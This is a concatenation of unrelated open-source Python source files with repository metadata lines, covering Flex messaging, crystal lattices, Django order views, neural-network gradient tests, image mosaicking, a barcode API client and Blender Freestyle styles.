#: whether this message type matches the message type the service
#: handles.
self.messageRefType = kwargs.get('messageRefType', None)
class ErrorMessage(AcknowledgeMessage):
"""
I am the Flex error message to be returned to the client.
This class is used to report errors within the messaging system.
@see: U{ErrorMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/ErrorMessage.html>}
"""
#: If a message may not have been delivered, the faultCode will contain
#: this constant.
MESSAGE_DELIVERY_IN_DOUBT = "Client.Error.DeliveryInDoubt"
#: Header name for the retryable hint header.
#:
#: This is used to indicate that the operation that generated the error may
#: be retryable rather than fatal.
RETRYABLE_HINT_HEADER = "DSRetryableErrorHint"
def __init__(self, *args, **kwargs):
AcknowledgeMessage.__init__(self, *args, **kwargs)
#: Extended data that the remote destination has chosen to associate
#: with this error to facilitate custom error processing on the client.
self.extendedData = kwargs.get('extendedData', {})
#: Fault code for the error.
self.faultCode = kwargs.get('faultCode', None)
#: Detailed description of what caused the error.
self.faultDetail = kwargs.get('faultDetail', None)
#: A simple description of the error.
self.faultString = kwargs.get('fa |
pylada/pylada-light | src/pylada/crystal/binary.py | Python | gpl-3.0 | 2,322 | 0.004737 | ###############################
# This file is part of PyLaDa.
#
# Copyright (C) 2013 National Renewable Energy Lab
#
# PyLaDa is a high throughput computational platform for Physics. It aims to make it easier to submit
# large numbers of jobs on supercomputers. It provides a python interface to physical input, such as
# crystal structures, as well as to a number of DFT (VASP, CRYSTAL) and atomic potential programs. It
# is able to organise and launch computational jobs on PBS and SLURM.
#
# PyLaDa is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# PyLaDa is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along with PyLaDa. If not, see
# <http://www.gnu.org/licenses/>.
###############################
""" Defines binary lattices. """
__docformat__ = "restructuredtext en"
__all__ = ['rock_salt', 'zinc_blende', 'wurtzite']
def rock_salt():
""" rock_salt lattice """
from pylada.crystal import Structure
return Structure(1, 0, 0,
0, 1, 0,
0, 0, 1,
scale=1, name='Rock-Salt' )\
.add_atom(0, 0, 0, 'A')\
.add_atom(0.5, 0.5, 0.5, 'B')
def zinc_blende():
""" zinc_blende lattice """
from pylada.crystal import Structure
return Structure(0, 0.5, 0.5,
0.5, 0, 0.5,
| 0.5, 0.5, 0,
scale=1, name='Zinc-Blende' )\
.add_atom(0, 0, 0, 'A')\
.add_atom(0.25, 0.25, 0.25, 'B')
def wurtzite():
""" wurtzite lattice """
from pylada.crystal import Structure
return Structure(0.5, 0.5, 0,
-0.866025, 0.866025, 0,
0, 0, 1,
| scale=1, name='Wurtzite' )\
.add_atom(0.5, 0.288675, 0, 'A')\
.add_atom(0.5, -0.288675, 0.5, 'A')\
.add_atom(0.5, 0.288675, 0.25, 'B')\
.add_atom(0.5, -0.288675, 0.75, 'B')
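# Minimal usage sketch, not part of the original module; it assumes Structure
# exposes the keyword arguments passed above (e.g. `name`) as attributes.
if __name__ == '__main__':
    for make_lattice in (rock_salt, zinc_blende, wurtzite):
        print(make_lattice().name)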
|
dannysellers/django_orders | tracker/views/workorder_views.py | Python | gpl-2.0 | 5,164 | 0.012393 | from django.template import RequestContext
from django.shortcuts import render_to_response, HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from django.contrib import messages
from django.core.urlresolvers import reverse
import re
import json
from ..models import WorkOrder, Shipment
@login_required
def work_orders (request, status = 'incomplete'):
context = RequestContext(request)
context_dict = dict()
open_orders = WorkOrder.objects.exclude(status = 4).exclude(status = 999)
finished_orders = WorkOrder.objects.filter(status = 4)
terminated_orders = WorkOrder.objects.filter(status = 999)
unmatched_orders = WorkOrder.objects.exclude(status = 999) \
.exclude(shipment__isnull = False)
header_list = ['Order ID', 'Shipment', 'Owner', 'Create Date', 'Status', '']
if status == 'incomplete':
context_dict['orders'] = open_orders
context_dict['count'] = open_orders.count()
elif status == 'complete':
context_dict['orders'] = finished_orders
header_list.pop() # Remove the blank column header over the Delete buttons
header_list.insert(3, 'Finish Date')
context_dict['count'] = finished_orders.count()
elif status == 'terminated':
context_dict['orders'] = terminated_orders
header_list.pop()
header_list.insert(4, 'Termination Date')
context_dict['count'] = terminated_orders.count()
elif status == 'unmatched':
context_dict['orders'] = unmatched_orders
context_dict['count'] = unmatched_orders.count()
else:
context_dict['orders'] = open_orders
context_dict['count'] = open_orders.count()
context_dict['status'] = status
context_dict['headers'] = header_list
return render_to_response('tracker/workorder_list.html', context_dict, context)
@login_required
def work_order_detail (request, id):
context = RequestContext(request)
context_dict = dict()
order = WorkOrder.objects.get(id = id)
header_list = ['Owner', 'Acct', 'Create Date', 'Shipment', 'Quantity', 'Status']
if order.status == 4:
        header_list.insert(3, 'Complete Date')
context_dict['headers'] = header_list
context_dict['order'] = order
context_dict['orderop_headers'] = ['Op ID', 'Time', 'Status', 'User']
return render_to_response('tracker/workorder_detail.html', context_dict, context)
@login_required
def remove_work_order (request, id):
try:
order = WorkOrder.objects.get(id = id)
order.remove_order()
messages.add_message(request, messages.SUCCESS, "Order {} removed.".format(order.id))
except WorkOrder.DoesNotExist:
messages.add_message(request, messages.ERROR, "Can't find any Work Order with ID {}".format(id))
return HttpResponseRedirect(reverse('work_order_list', args = ['incomplete']))
@login_required
def link_work_order (request, orderid):
"""
Function to handle linking WorkOrder and Shipment objects
"""
if request. | method != 'POST':
return HttpResponseRedirect(reverse('work_orders'))
else:
# TODO: Alert the user t | o discrepancies b/w the Work Order and the Shipment (i.e. different quantity)
order = WorkOrder.objects.get(id = orderid)
ship_desc = request.POST.get('shipid')
        ship_id = re.findall(r'#(\d+):', ship_desc)[0]
shipment = Shipment.objects.get(shipid = ship_id)
order.shipment = shipment
order.save()
messages.add_message(request, messages.SUCCESS, "Order {0} and Shipment {1} linked successfully.".format(
order.id, shipment.shipid
))
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
@csrf_exempt
def get_unmatched_shipments (request, order_id):
"""
AJAX function to list Shipments that have no associated Work Order.
Returns shipments belonging to a particular Customer (order owner)
that are unmatched and still in storage (redundant?)
"""
context_dict = dict()
order = WorkOrder.objects.get(id = order_id)
_owner = order.owner
_list = Shipment.objects.exclude(status = 4) \
.filter(owner = _owner) \
.exclude(_workorder__isnull = False)
context_dict['list'] = [str(shipment) for shipment in _list]
return HttpResponse(json.dumps(context_dict), content_type = 'application/json')
@csrf_exempt
def get_unmatched_orders (request, ship_id):
"""
AJAX function to list Work Orders that have no associated Shipment.
Returns Work Orders belonging to a particular Customer (shipment owner)
that are unmatched and not deleted
"""
# TODO: Method to get unmatched orders by Acct ID
context_dict = dict()
shipment = Shipment.objects.get(shipid = ship_id)
_owner = shipment.owner
_list = WorkOrder.objects.exclude(status = 999) \
.filter(owner = _owner) \
.exclude(shipment__isnull = False)
context_dict['list'] = [str(order) for order in _list]
return HttpResponse(json.dumps(context_dict), content_type = 'application/json')
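# Illustrative JSON payload produced by both AJAX views above; each entry is
# the str() form of an unmatched Shipment or WorkOrder (exact formatting is
# defined by the models' __str__ methods, not shown here):
#   {"list": ["...", "..."]}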
|
cgpotts/cs224u | test/test_np_model_gradients.py | Python | apache-2.0 | 7,151 | 0.000699 | from nltk.tree import Tree
from np_shallow_neural_classifier import ShallowNeuralClassifier
from np_rnn_classifier import RNNClassifier
from np_autoencoder import Autoencoder
from np_tree_nn import TreeNN
import numpy as np
import pytest
import utils
__author__ = "Christopher Potts"
__version__ = "CS224u, Stanford, Spring 2021"
utils.fix_random_seeds()
class GradientCheckError(Exception):
"""Raised if a gradient check fails."""
@pytest.mark.parametrize("hidden_activation, d_hidden_activation", [
[np.tanh, utils.d_tanh],
[utils.relu, utils.d_relu]
])
def test_np_shallow_neural_classifier_gradients(hidden_activation, d_hidden_activation):
model = ShallowNeuralClassifier(
max_iter=10,
hidden_activation=hidden_activation,
d_hidden_activation=d_hidden_activation)
# A tiny dataset so that we can run `fit` and set all the model
# parameters:
X = utils.randmatrix(5, 2)
y = np.random.choice((0,1), 5)
model.fit(X, y)
# Use the first example for the check:
ex = X[0]
label = model._onehot_encode([y[0]])[0]
# Forward and backward to get the gradients:
hidden, pred = model.forward_propagation(ex)
d_W_hy, d_b_hy, d_W_xh, d_b_xh = model.backward_propagation(
hidden, pred, ex, label)
# Model parameters to check:
param_pairs = (
('W_hy', d_W_hy),
('b_hy', d_b_hy),
('W_xh', d_W_xh),
('b_xh', d_b_xh)
)
gradient_check(param_pairs, model, ex, label)
@pytest.mark.parametrize("hidden_activation, d_hidden_activation", [
[np.tanh, utils.d_tanh],
[utils.relu, utils.d_relu]
])
def test_np_rnn_classifier(hidden_activation, d_hidden_activation):
# A tiny dataset so that we can run `fit` and set all the model
# parameters:
vocab = ['a', 'b', '$UNK']
data = [
[list('ab'), 'good'],
[list('aab'), 'good'],
[list('abb'), 'good']]
model = RNNClassifier(
vocab,
max_iter=10,
hidden_dim=2,
hidden_activation=hidden_activation,
d_hidden_activation=d_hidden_activation)
X, y = zip(*data)
model.fit(X, y)
# Use the first example for the check:
ex = X[0]
label = model._onehot_encode([y[0]])[0]
# Forward and backward to get the gradients:
hidden, pred = model.forward_propagation(ex)
d_W_hy, d_b, d_W_hh, d_W_xh = model.backward_propagation(
hidden, pred, ex, label)
# Model parameters to check:
param_pairs = (
('W_xh', d_W_xh),
('W_hh', d_W_hh),
('W_hy', d_W_hy),
('b', d_b)
)
gradient_check(param_pairs, model, ex, label)
@pytest.mark.parametrize("hidden_activation, d_hidden_activation", [
[np.tanh, utils.d_tanh],
[utils.relu, utils.d_relu]
])
def test_np_autoencoder(hidden_activation, d_hidden_activation):
model = Autoencoder(
max_iter=10,
hidden_dim=2,
hidden_activation=hidden_activation,
d_hidden_activation=d_hidden_activation)
# A tiny dataset so that we can run `fit` and set all the model
# parameters:
X = utils.randmatrix(5, 5)
model.fit(X)
# Use the first example for the check:
ex = X[0]
label = X[0]
# Forward and backward to get the gradients:
hidden, pred = model.forward_propagation(ex)
d_W_hy, d_b_hy, d_W_xh, d_b_xh = model.backward_propagation(
hidden, pred, ex, label)
# Model parameters to check:
param_pairs = (
('W_hy', d_W_hy),
('b_hy', d_b_hy),
('W_xh', d_W_xh),
('b_xh', d_b_xh)
)
gradient_check(param_pairs, model, ex, label)
@pytest.mark.parametrize("hidden_activation, d_hidden_activation", [
[np.tanh, utils.d_tanh],
[utils.relu, utils.d_relu]
])
def test_np_tree_nn(hidden_activation, d_hidden_activation):
# A tiny dataset so that we can run `fit` and set all the model
# parameters:
vocab = ["1", "+", "2"]
X = [
"(even (odd 1) (neutral (neutral +) (odd 1)))",
"(odd (odd 1) (neutral (neutral +) (even 2)))"]
X = [Tree.fromstring(ex) for ex in X]
y = [tree.label() for tree in X]
model = TreeNN(
vocab,
max_iter=10,
hidden_dim=5,
hidden_activation=hidden_activation,
d_hidden_activation=d_hidden_activation)
model.fit(X, y)
# Use the first example for the check:
ex = X[0]
label = model._onehot_encode([ex.label()])[0]
# Forward and backward to get the gradients:
hidden, pred = model.forward_propagation(ex)
d_W_hy, d_b_y, d_W, d_b = model.backward_propagation(
hidden, pred, ex, label)
# Model parameters to check:
param_pairs = (
('W_hy', d_W_hy),
('b_y', d_b_y),
('W', d_W),
('b', d_b)
)
gradient_check(param_pairs, model, ex, label)
def gradient_check(param_pairs, model, ex, label, epsilon=0.0001, threshold=0.001):
"""
Numerical gradient check following the method described here:
http://ufldl.stanford.edu/wiki/index.php/Gradient_checking_and_advanced_optimization
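    The backpropagation gradient of each parameter entry is compared against
    the central-difference estimate
    (error(param + epsilon) - error(param - epsilon)) / (2 * epsilon).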
Parameters
----------
param_pairs : list of str, np.aray pairs
In each pair, the first is the name of the parameter to check,
and the second is its purported derivatives. We use the name
as the first pair so that we can raise an informative error
message in the case of a failure.
model : trained model instance
This should have attributes for all of the parameters named in
`param_pairs`, and it must have methods `forward_propagation`,
and `get_error`.
ex : an example that `model` can process
label : a label vector that `model` can learn from directly
epsilon : float
The small constant by which the parameter values are changed.
threshold : float
Tolerance for raising an error.
Raises
------
GradientCheckError
" | ""
for param_name, d_params in param_pairs:
params = getattr(model, param_name)
        # This iterator will allow us to cycle over all the values for
# arra | ys of any dimension:
iterator = np.nditer(params, flags=['multi_index'], op_flags=['readwrite'])
while not iterator.finished:
idx = iterator.multi_index
actual = params[idx]
params[idx] = actual + epsilon
_, pred = model.forward_propagation(ex)
grad_pos = model.get_error(pred, label)
params[idx] = actual - epsilon
_, pred = model.forward_propagation(ex)
grad_neg = model.get_error(pred, label)
grad_est = (grad_pos - grad_neg) / (epsilon * 2.0)
params[idx] = actual
grad_bp = d_params[idx]
# Relative error to control for differences in proportion
# across parameter values:
err = np.abs(grad_bp - grad_est) / (np.abs(grad_bp) + np.abs(grad_est))
if err >= threshold:
raise GradientCheckError(
"Gradient check error for {} at {}: error is {}".format(
param_name, idx, err))
iterator.iternext()
|
mustafa-cosar/ceng445Project | src/ApplicationProcess.py | Python | gpl-3.0 | 4,252 | 0.004468 | from multiprocessing import *
from ceng445 import *
import json
import traceback
STATUS_OK = 'OK'
STATUS_FAIL = 'FAIL'
class ApplicationProcess(Process):
def __init__(self, connectionInfo):
super(ApplicationProcess, self).__init__()
self._conn = connectionInfo[0]
self._addr = connectionInfo[1]
self._app = Application()
def run(self):
print("Connection established with pair: ", self._conn)
try:
while self._conn:
receivedData = self._conn.recv(65536).decode('utf-8')
command = json.loads(receivedData)
result = json.dumps(self.handle(comm | and), indent='\t')
self._conn.send(result.encode('utf-8'))
except:
print("Connection closed! with pair: ", self._conn)
self._conn.close()
def handle(self, cmd):
result = {}
command = cmd.get | ('command', None)
print(cmd)
if command == 'available':
try:
result['result'] = self._app.available()
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'loaded':
try:
result['result'] = self._app.loaded()
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'load':
try:
result['result'] = self._app.load(cmd['args']['name'])
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'instances':
try:
result['result'] = self._app.instances()
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'addInstance':
try:
result['result'] = self._app.addInstance(cmd['args']['componentName'], cmd['args']['x'], cmd['args']['y'])
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'removeInstance':
try:
result['result'] = self._app.removeInstance(cmd['args']['id'])
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'callMethod':
try:
params = tuple(cmd['args']['params'])
params = None if params == () else self._getParams(params)
if params == None:
result['result'] = self._app.callMethod(cmd['args']['id'], cmd['args']['methodName'], None)
else:
result['result'] = self._app.callMethod(cmd['args']['id'], cmd['args']['methodName'], *params)
result['status'] = STATUS_OK
except:
traceback.print_exc()
result['status'] = STATUS_FAIL
elif command == 'saveDesign':
try:
result['result'] = self._app.saveDesign(cmd['args']['path'])
result['status'] = STATUS_OK
except:
traceback.print_exc()
result['status'] = STATUS_FAIL
elif command == 'loadDesign':
try:
result['result'] = self._app.loadDesign(cmd['args']['path'])
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
elif command == 'execute':
try:
result['result'] = self._app.execute()
result['status'] = STATUS_OK
except:
result['status'] = STATUS_FAIL
else:
result['result'] = 'Available Commands: '
result['status'] = STATUS_OK
return result
def _getParams(self, params):
#TODO: Does not cover all possible cases. Improve it later
retVal = []
for i in params:
if type(i) == type({}) and i.get('__factory__', None) == True:
retVal.append(Factory().createInstance(i['name']))
else:
retVal.append(i)
return tuple(retVal)
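# Illustrative wire format, not part of the original module: handle() expects
# one JSON object per socket message and replies with a JSON object, e.g.
#   request:  {"command": "load", "args": {"name": "SomeComponent"}}
#   response: {"status": "OK", "result": ...}
# "SomeComponent" is a placeholder; valid names come from the 'available'
# command.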
|
bmenard1/GroundSurveyor | ground_surveyor/uf_mosaic.py | Python | apache-2.0 | 5,019 | 0.003188 | import os
import json
import logging
import numpy
from osgeo import gdal
from ground_surveyor import gsconfig
def pick_best_pile_layer(pile_md_filename,
selection_options):
pile_md = json.load(open(pile_md_filename))
best_i = -1
best_value = 0
target_field = selection_options.get('order_field',
'normalized_sharpness')
cc_threshold = selection_options.get('cross_correlation_threshold',
None)
small_cc_threshold = selection_options. | get(
'small_cross_correlation_threshold',
None | )
zero_threshold = selection_options.get('zero_threshold',
None)
for i in range(len(pile_md['sharpness'])):
if cc_threshold is not None:
cc_raw = pile_md['cross_correlation_raw'][i]
if cc_raw < cc_threshold:
continue
if small_cc_threshold is not None:
small_cc = pile_md['cross_correlation_small'][i]
if small_cc < small_cc_threshold:
continue
if zero_threshold is not None and pile_md['n_pixel_at_zero_intensity'][i] > zero_threshold:
continue
if target_field == 'normalized_sharpness':
target_value = pile_md['sharpness'][i] \
/ pile_md['intensity_median'][i]
else:
target_value = pile_md[target_field]
if target_value > best_value:
best_value = target_value
best_i = i
# If nothing met the threshold, try again without the threshold.
if best_i == -1 and cc_threshold is not None:
for i in range(len(pile_md['sharpness'])):
if zero_threshold is not None and pile_md['n_pixel_at_zero_intensity'][i] > zero_threshold:
continue
if target_field == 'normalized_sharpness':
target_value = pile_md['sharpness'][i] \
/ pile_md['intensity_median'][i]
else:
target_value = pile_md[target_field]
if target_value > best_value:
best_value = target_value
best_i = i
logging.debug('Picked input metatile %d for pile %s with %s value of %s.',
best_i,
os.path.basename(pile_md_filename)[:15],
target_field, best_value)
return best_i
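# Illustrative selection_options dict for pick_best_pile_layer; the keys are
# the ones read above, while the threshold values are made-up examples:
#   {'order_field': 'normalized_sharpness',
#    'cross_correlation_threshold': 0.9,
#    'small_cross_correlation_threshold': 0.8,
#    'zero_threshold': 100}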
def get_pile_layer(pile_md_filename, i_file):
raw_filename = pile_md_filename.replace('_datacube_metadata.json',
'_raw.tif')
raw_ds = gdal.Open(raw_filename)
return raw_ds.GetRasterBand(i_file+1).ReadAsArray()
def merge_pile_into_mosaic(mosaic_ds,
pile_md_filename,
selected_i,
selected_img,
processing_options):
pile_parts = os.path.basename(pile_md_filename).split('_')[0:3]
assert pile_parts[0] == 'uf'
uf_i = int(pile_parts[1])
uf_j = int(pile_parts[2])
if processing_options.get('normalize_intensity',False):
pile_md = json.load(open(pile_md_filename))
selected_img = selected_img * 1000.0 \
/ pile_md['intensity_median'][selected_i]
mosaic_ds.GetRasterBand(1).WriteArray(
selected_img, uf_i * 256, uf_j * 256)
alpha_band = mosaic_ds.GetRasterBand(mosaic_ds.RasterCount)
if alpha_band.GetColorInterpretation() == gdal.GCI_AlphaBand:
if alpha_band.DataType == gdal.GDT_UInt16:
opaque = 65535
else:
opaque = 255
alpha_band.WriteArray(
numpy.ones(selected_img.shape) * opaque,
uf_i * 256, uf_j * 256)
def make_metatile(pile_directory):
mosaic_filename = os.path.join(pile_directory,'mosaic.tif')
mosaic_ds = gdal.GetDriverByName('GTiff').Create(
mosaic_filename, 4096, 4096, 1, gdal.GDT_UInt16)
# TODO: Try to add georeferencing...
return mosaic_filename, mosaic_ds
def mosaic_metatile(pile_directory,
selection_options,
processing_options={}):
mosaic_filename, mosaic_ds = make_metatile(pile_directory)
counter = 0
for filename in os.listdir(pile_directory):
if (not filename.startswith('uf_')) or (not filename.endswith('_metadata.json')):
continue
pile_md_filename = os.path.join(pile_directory, filename)
i_file = pick_best_pile_layer(pile_md_filename, selection_options)
if i_file >= 0:
selected_img = get_pile_layer(pile_md_filename, i_file)
merge_pile_into_mosaic(mosaic_ds, pile_md_filename,
i_file, selected_img,
processing_options)
counter += 1
logging.info('%d piles contributed to making %s.',
counter, mosaic_filename)
return mosaic_filename
|
appsembler/mayan_appsembler | apps/ocr/parsers/exceptions.py | Python | gpl-3.0 | 218 | 0 | class ParserError(Exception):
"""
    Raised when a text parser fails to understand a file it has been passed
| or the resulting parsed text is invalid
"""
pass
class Pars | erUnknownFile(Exception):
pass
|
bytescout/ByteScout-SDK-SourceCode | Cloud API Server/Barcode Reader API/Python/Read Barcode From Uploaded File/ReadBarcodeFromUploadedFile.py | Python | apache-2.0 | 3,125 | 0.00736 | import os
import requests # pip install requests
# Please NOTE: In this sample we're assuming Cloud Api Server is hosted at "https://localhost".
# If it's not then please replace this with with your hosting url.
# Base URL for PDF.co Web API requests
BASE_URL = "https://localhost"
# Source file name
SourceFile = ".\\sample.pdf"
# Comma-separated list of barcode types to search.
# See valid barcode types in the documentation https://app.pdf.co/documentation/api/1.0/barcode/read_from_url.html
BarcodeTypes = "Code128,Code39,Interleaved2of5,EAN13"
# Comma-separated list of page indices (or ranges) to process. Leave empty for all pages. Example: '0,2-5,7-'.
Pages = ""
def main(args = None):
uploadedFileUrl = uploadFile(SourceFile)
if (uploadedFileUrl != None):
readBarcodes(uploadedFileUrl)
def readBarcodes(uploadedFileUrl):
"""Get Barcode Information using PDF.co Web API"""
# Prepare URL for 'Barcode Reader' API request
url = "{}/barcode/read/from/url?types={}&pages={}&url={}".format(
BASE_URL,
BarcodeTypes,
Pages,
uploadedFileUrl
)
# Execute request and get response as JSON
response = requests.get(url, headers={ "content-type": "application/octet-stream" })
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# Display information
for barcode in json["barcodes"]:
print("Found barcode:")
print(f" Type: {barco | de['TypeName']}")
print(f" Value: {barcode['Value']}")
print(f" Document Page Index: {barcode['Page']}")
print(f" Rectangle: {barcode['Rect']}")
print(f" Confidence: {barcode['Confidence']}")
print("")
| else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
def uploadFile(fileName):
"""Uploads file to the cloud"""
# 1. RETRIEVE PRESIGNED URL TO UPLOAD FILE.
# Prepare URL for 'Get Presigned URL' API request
url = "{}/file/upload/get-presigned-url?contenttype=application/octet-stream&name={}".format(
BASE_URL, os.path.basename(fileName))
# Execute request and get response as JSON
response = requests.get(url)
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# URL to use for file upload
uploadUrl = json["presignedUrl"]
# URL for future reference
uploadedFileUrl = json["url"]
# 2. UPLOAD FILE TO CLOUD.
with open(fileName, 'rb') as file:
requests.put(uploadUrl, data=file, headers={ "content-type": "application/octet-stream" })
return uploadedFileUrl
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
return None
if __name__ == '__main__':
main() |
RexFuzzle/sfepy | tests/test_hyperelastic_tlul.py | Python | bsd-3-clause | 3,003 | 0.00333 | input_names = {'TL': '../examples/large_deformation/hyperelastic.py',
'UL': '../examples/large_deformation/hyperelastic_ul.py',
'ULM': '../examples/large_deformation/hyperelastic_ul_up.py'}
output_name_trunk = 'test_hyperelastic_'
from sfepy.base.testing import TestCommon
from tests_basic import NLSStatus
class Test(TestCommon):
@staticmethod
def from_conf(conf, options):
return Test(conf = conf, options = options)
def test_solution(self):
from sfepy.base.base import Struct
from sfepy.base.conf import ProblemConf, get_standard_keywords
from sfepy.applications import solve_pde, assign_standard_hooks
import numpy as nm
import os.path as op
solutions = {}
ok = True
for hp, pb_filename in input_names.iteritems():
required, other = get_standard_keywords()
input_name = op.join(op.dirname(__file__), pb_filename)
test_conf = ProblemConf.from_file(input_name, required, other)
| name = output_name_trunk + hp
solver_options = Struct(output_filename_trunk=name,
output_format='vtk',
save_ebc=False, save_ebc_nodes=False,
save_regions=False,
save_regions_as_groups=False,
save_field_meshes=False,
solve_not=False)
| assign_standard_hooks(self, test_conf.options.get, test_conf)
self.report( 'hyperelastic formulation: %s' % (hp, ) )
status = NLSStatus(conditions=[])
pb, state = solve_pde(test_conf,
solver_options,
nls_status=status,
output_dir=self.options.out_dir,
step_hook=self.step_hook,
post_process_hook=self.post_process_hook,
post_process_hook_final=self.post_process_hook_final)
converged = status.condition == 0
ok = ok and converged
solutions[hp] = state.get_parts()['u']
self.report('%s solved' % input_name)
rerr = 1.0e-3
aerr = nm.linalg.norm(solutions['TL'], ord=None) * rerr
self.report('allowed error: rel = %e, abs = %e' % (rerr, aerr))
ok = ok and self.compare_vectors(solutions['TL'], solutions['UL'],
label1='TLF',
label2='ULF',
allowed_error=rerr)
ok = ok and self.compare_vectors(solutions['UL'], solutions['ULM'],
label1='ULF',
label2='ULF_mixed',
allowed_error=rerr)
return ok
|
paramsingh/backpage | backpage/urls.py | Python | mit | 315 | 0.015873 | fr | om django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'backpage.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^app/', incl | ude('app.urls'))
) |
alpine9000/amiga_examples | tools/external/amitools/amitools/fs/block/UserDirBlock.py | Python | bsd-2-clause | 2,641 | 0.009466 | import time
from Block import Block
from ..ProtectFlags import ProtectFlags
class UserDirBlock(Block):
def __init__(self, blkdev, blk_num):
Block.__init__(self, blkdev, blk_num, is_type=Block.T_SHORT, is_sub_type=Block.ST_USERDIR)
def set(self, data):
self._set_data(data)
self._read()
def read(self):
self._read_data()
self._read()
def _read(self):
Block.read(self)
if not self.valid:
return False
# UserDir fields
self.own_key = self._get_long(1)
self.protect = self._get_long(-48)
self.comment = self._get_bstr(-46, 79)
self.mod_ts = self._get_timestamp(-23)
self.name = self._get_bstr(-20, 30)
self.hash_chain = self._get_long(-4)
self.parent = self._get_long(-3)
self.extension = self._get_long(-2)
# hash table of entries
self.hash_table = []
self.hash_size = self.blkdev.block_longs - 56
for i in xrange(self.hash_size):
self.hash_table.append(self._get_long(6+i))
self.valid = (self.own_key == self.blk_num)
return self.valid
def create(self, parent, name, protect=0, comment=None, mod_ts=None, hash_chain=0, extension=0):
Block.create(self)
self.own_key = self.blk_num
self.protect = protect
if comment == None:
self.comment = ''
else:
self.comment = comment
# timestamps
self.mod_ts = mod_ts
self.name = name
self.hash_chain = hash_chain
self.parent = parent
self.extension = extension
# empty hash table
self.hash_table = []
self.hash_size = self.blkdev.block_longs - 56
for i in xrange(self.hash_size):
self.hash_table.append(0)
self.valid = True
return True
def write(self):
Block._create_data(self)
self._put_long(1, self.own_key)
self._put_long(-48, self.protect)
self._put_bstr(-46, 79, self.comment)
self._put_timestamp(-23, self.mod_ts)
self._put_bstr(-20, 30, self.name)
self._put_long(-4, self.hash_chain)
self._put_long(-3, self.parent)
self._put_long(-2, self.extension)
# hash table
for i in xrange(self.hash_size):
self._put_long(6+i, self.hash_table[i])
Block | .write(self)
def dump(self):
Block.dump(self,"UserDir")
print " own_key: %d" % (self.own_key)
pf = ProtectFlags(self.protect)
print " protect: 0x%x 0b%s %s" % (self.protect, pf.bin_str(), pf)
print " comment: '%s'" % self.comment
print " mod_ts: %s" % self.mod_ts
print " name: '%s'" % self.name
print " hash_ | chain: %d" % self.hash_chain
print " parent: %d" % self.parent
print " extension: %s" % self.extension
|
Toilal/roundtm | roundtm/console.py | Python | lgpl-3.0 | 1,499 | 0 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# RoundTM - A Round based Tournament Manager
# Copyright (c) 2013 Rémi Alvergnat <toilal.dev@gmail.com>
#
# RoundTM is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# RoundTM is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from .events import Event
class Console(object):
"""Controls an Event with console."""
def __ | init__(self, event):
self._eve | nt = event
@property
def next_round(self):
"""Go to next round, using the provided strategy"""
return self._event.next_round()
@property
def ranking(self):
"""Display current ranking"""
i = 1
for stat in self._event.ranking:
print "[%s] %s" % (i, stat)
i += 1
def load(path):
"""Load a project in console mode.
:return: class `Console`, a control object for console usage (IPython)
"""
return Console(Event(path))
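# Illustrative IPython session (the project path is a placeholder):
#   >>> c = load('path/to/project')
#   >>> c.next_round   # advance the event using the configured strategy
#   >>> c.ranking      # print the current standings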
|
Microvellum/Fluid-Designer | win64-vc/2.78/scripts/freestyle/styles/apriori_density.py | Python | gpl-3.0 | 1,743 | 0.003442 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Filename : apriori_density.py
# Author : Stephane Grabli
# Date : 04/08/2005
# Purpose : Draws lines having a high a priori density
from freestyle.chainingiterators import ChainPredicateIterator
from freestyle.predicates import (
AndUP1D,
NotUP1D,
QuantitativeInvisibilityUP1D,
TrueBP1D,
TrueUP1D,
pyHighViewMapDensityUP1D,
)
from freestyle.shaders import (
ConstantColorShader,
ConstantThicknessShader,
)
from freestyle.types import Operators
Operators.select(AndUP1D(QuantitativeInvisibilityUP1D(0), pyHighViewMapDensityUP1D(0.1,5)))
bpred = TrueBP1D()
upred = AndUP1D(QuantitativeInvisibilityUP1D(0), pyHighViewMapDensityUP1D(0.0007,5))
